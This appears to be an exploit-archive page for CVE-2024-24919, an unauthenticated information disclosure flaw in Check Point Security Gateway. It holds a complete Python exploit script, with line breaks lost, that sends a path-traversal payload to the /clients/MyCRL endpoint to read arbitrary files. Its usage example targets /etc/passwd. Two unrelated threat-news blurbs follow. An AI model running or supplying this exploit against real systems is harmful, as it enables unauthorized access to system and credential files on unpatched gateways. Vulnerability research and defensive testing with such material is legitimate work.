Headline
Check Point Security Gateway Information Disclosure
Check Point Security Gateway suffers from an information disclosure vulnerability. Versions affected include R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.
# Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919from requests import Request, Sessionimport sysimport jsondef title(): print(''' _______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___ / ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \ | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) | | | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, | | |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / / \_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/ Author: Yesith AlvarezGithub: https://github.com/yealvarezLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, path): url = url + '/clients/MyCRL' data = "aCSHELL/../../../../../../../../../../.."+ path headers = { 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' } s = Session() req = Request('POST', url, data=data, headers=headers) prepped = req.prepare() #del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) print(prepped.headers) print(url) print(resp.headers) print(resp.status_code)if __name__ == '__main__': title() if(len(sys.argv) < 3): print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0])) print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])
Related news
The China-linked advanced persistent threat (APT) group known as Mustang Panda has been observed weaponizing Visual Studio Code software as part of espionage operations targeting government entities in Southeast Asia. "This threat actor used Visual Studio Code's embedded reverse shell feature to gain a foothold in target networks," Palo Alto Networks Unit 42 researcher Tom Fakterman said in a
U.S. cybersecurity and intelligence agencies have called out an Iranian hacking group for breaching multiple organizations across the country and coordinating with affiliates to deliver ransomware. The activity has been linked to a threat actor dubbed Pioneer Kitten, which is also known as Fox Kitten, Lemon Sandstorm (formerly Rubidium), Parisite, and UNC757, which it described as connected to